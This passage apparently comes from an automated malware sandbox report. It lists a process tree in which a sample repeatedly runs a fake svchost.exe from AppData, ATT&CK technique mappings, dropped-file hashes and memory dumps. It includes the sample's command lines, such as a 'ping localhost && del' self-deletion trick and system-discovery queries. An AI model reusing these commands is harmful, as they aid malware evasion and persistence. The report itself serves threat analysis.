    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1512
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2256
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\iednmj.exe" && pause
    3⤵
    PID:1664
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:1924

C:\Windows\system32\taskeng.exe
taskeng.exe {90BAF0C2-A960-49BE-9A10-500A906A5ADF} S-1-5-21-3294248377-1418901787-4083263181-1000:FMEDFXFE\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1308
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1712
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2708
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2456
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1052
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1636
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1232
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1672
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2464
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1408
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2492
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1800
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1988
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:556
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:872
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2604
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2512
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2324
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1740
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1120
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1292
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2464
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1860
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1204
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:308
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:652
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:1784
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2208
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2612
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2668
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2064
- C:\Users\Admin\AppData\Roaming\svchost.exe
  C:\Users\Admin\AppData\Roaming\svchost.exe
  2⤵
  - Executes dropped EXE
  PID:2452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ZnsoseXpUGfA3KY\Display\Display.png

Filesize
379KB

MD5
0269b2440881afc8b8a3356afa6912e4

SHA1
ecb66d41f7ac879e741427531a0550273d4cb519

SHA256
b823a59e225449e72c92be97050b53bac5083443902a937e541c49a2fb57c8f3

SHA512
63bae2d774da23dcce52172de418250bdd4d42d7ea0762a8e575048f77cd2b8773b8ad9f6ed77d9f07e58c652a7a868ed085b9d08f5fcca430a1595bb1a7d2f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\dlMx2sVADQZsDIe

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe

Filesize
253KB

MD5
9f3f506175ad4d9550bf1aea609694a7

SHA1
6cc35e30d5b40eb1b5d115feec12ec247a84193f

SHA256
7103785c72f15bc66849b927bb9b0030c2a8383a8f71cd4308b0b42055d8d467

SHA512
b4a691e3b679dac187f1219cff013d3e27a87d55bf10c4744b8aba969a0caac39922dbbf9bce454b87e3e685f5bfa9043ecabacca090650278ab2d081bc2d5cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\places.raw

Filesize
5.0MB

MD5
2ef239599179e7e86cf9b5a52e941597

SHA1
fdaea13d732de4776eaf303b51fceb1bbe5f3984

SHA256
c5428bb9ef5434800dc7f53b59aed69314e976549fa2672c3808f45a5b3a5a14

SHA512
1b01dd689adc5555ef4ac4ece779cd8578af0befb3fb59ed56e3d047b86b39f8b0f1c85639bf025041f630cedaf52306309371473aa16bac85433db49442bd76

Download Submit
C:\Users\Admin\AppData\Local\Temp\pr2a2xOi3rP4WQL

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpBF03.tmp.dat

Filesize
92KB

MD5
cf00cf5b059b43e29cbde1a36c6209f3

SHA1
9df2f8ef60997e3934fef0d88f9770fb9d19769f

SHA256
9f861e6046979ac19a569747cd17b7e77a8e1301c870691595a68d9a8244a30a

SHA512
16e433a67de26cbf052f2639df05c5d3d2c5ef5d4ef065b45af913174e08415bd6672f6637e8727e88b2e68c74c2ffeabc6673e1506e8ad397edb198e0276399

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8f92f318747327f9b8cefb9e7919b13c

SHA1
71f8ad4c44b2ef49dc19244d9e15af656dddbf03

SHA256
fec9ae15ce6644a9fb5776edf7423b1803a762428cb8c2591bdf38ead8422c0b

SHA512
ce473dc287c691e603c606b962ffa9103ebac501915981d88bdeb5232b0fba0a3cb049119f2e8515a870e058ad2dc78c541f7a844d5d7ebd86b01d7991afc7c3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c82bc064fcf9b0a953cb64a23dc2351d

SHA1
7723ad4a32be99047ffb8a20866f59da167728ac

SHA256
5a760f612cb61e640311f29d7d0e31244fdc4780e33fa5034dbec753362dade9

SHA512
7fa116c45767c5f87cac5e05bf075f0ef69d3e9c7bb7db0185871b95d85d433f1484717ecaab035fe9936ad30750dd28e7ab79559531d05ed35be4f4deb3f09a

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
102KB

MD5
ce28d82fa8e4dbbd72cae1bf8d4930e1

SHA1
0cba2f93bc5c9d9e4f950c66e7ac3acee3ce418f

SHA256
d9ca4eaa59a18b4b30518a5c85c757a8b04240e579a1460f0472c608aa2b7bc2

SHA512
ba5506f4dfa1c46e9ac38ca1c6ffabd1870eb4c99d98dae963dda8c387cc1c423a1cbef09f93befba889a65f8f51f34663f64dbb14743c82d8ec40fc036fe57e

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
577f27e6d74bd8c5b7b0371f2b1e991c

SHA1
b334ccfe13792f82b698960cceaee2e690b85528

SHA256
0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9

SHA512
944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

Download Submit
memory/872-289-0x00000000001F0000-0x0000000000210000-memory.dmp

Filesize
128KB

Download
memory/916-161-0x0000000000EC0000-0x0000000000F06000-memory.dmp

Filesize
280KB

Download
memory/1120-292-0x0000000000AA0000-0x0000000000AC0000-memory.dmp

Filesize
128KB

Download
memory/1204-295-0x00000000010E0000-0x0000000001100000-memory.dmp

Filesize
128KB

Download
memory/1232-251-0x0000000000210000-0x0000000000230000-memory.dmp

Filesize
128KB

Download
memory/1292-293-0x0000000000F90000-0x0000000000FB0000-memory.dmp

Filesize
128KB

Download
memory/1408-281-0x00000000010B0000-0x00000000010D0000-memory.dmp

Filesize
128KB

Download
memory/1672-277-0x00000000010A0000-0x00000000010C0000-memory.dmp

Filesize
128KB

Download
memory/1712-34-0x0000000000F30000-0x0000000000F50000-memory.dmp

Filesize
128KB

Download
memory/1740-291-0x0000000000290000-0x00000000002B0000-memory.dmp

Filesize
128KB

Download
memory/1800-284-0x0000000000190000-0x00000000001B0000-memory.dmp

Filesize
128KB

Download
memory/1860-294-0x00000000001B0000-0x00000000001D0000-memory.dmp

Filesize
128KB

Download
memory/1988-286-0x0000000000F70000-0x0000000000F90000-memory.dmp

Filesize
128KB

Download
memory/2064-299-0x0000000000CB0000-0x0000000000CD0000-memory.dmp

Filesize
128KB

Download
memory/2208-296-0x00000000012B0000-0x00000000012D0000-memory.dmp

Filesize
128KB

Download
memory/2256-124-0x0000000002AA0000-0x0000000002AA8000-memory.dmp

Filesize
32KB

Download
memory/2300-117-0x0000000000B20000-0x0000000000B66000-memory.dmp

Filesize
280KB

Download
memory/2452-300-0x00000000003A0000-0x00000000003C0000-memory.dmp

Filesize
128KB

Download
memory/2456-109-0x0000000001290000-0x00000000012B0000-memory.dmp

Filesize
128KB

Download
memory/2464-279-0x0000000000230000-0x0000000000250000-memory.dmp

Filesize
128KB

Download
memory/2584-42-0x0000000000A50000-0x0000000000A96000-memory.dmp

Filesize
280KB

Download
memory/2604-290-0x0000000001220000-0x0000000001240000-memory.dmp

Filesize
128KB

Download
memory/2612-297-0x0000000000360000-0x0000000000380000-memory.dmp

Filesize
128KB

Download
memory/2668-298-0x0000000000BA0000-0x0000000000BC0000-memory.dmp

Filesize
128KB

Download
memory/2724-15-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2724-14-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2904-208-0x00000000001F0000-0x0000000000236000-memory.dmp

Filesize
280KB

Download
memory/2912-36-0x000007FEF5100000-0x000007FEF5AEC000-memory.dmp

Filesize
9.9MB

Download
memory/2912-2-0x000007FEF5100000-0x000007FEF5AEC000-memory.dmp

Filesize
9.9MB

Download
memory/2912-152-0x000000001C4B0000-0x000000001C560000-memory.dmp

Filesize
704KB

Download
memory/2912-1-0x0000000001090000-0x00000000010B0000-memory.dmp

Filesize
128KB

Download
memory/2912-35-0x000007FEF5103000-0x000007FEF5104000-memory.dmp

Filesize
4KB

Download
memory/2912-82-0x000000001B9C0000-0x000000001BAE0000-memory.dmp

Filesize
1.1MB

Download
memory/2912-0-0x000007FEF5103000-0x000007FEF5104000-memory.dmp

Filesize
4KB

Download
memory/2916-7-0x000000001B530000-0x000000001B812000-memory.dmp

Filesize
2.9MB

Download
memory/2916-8-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download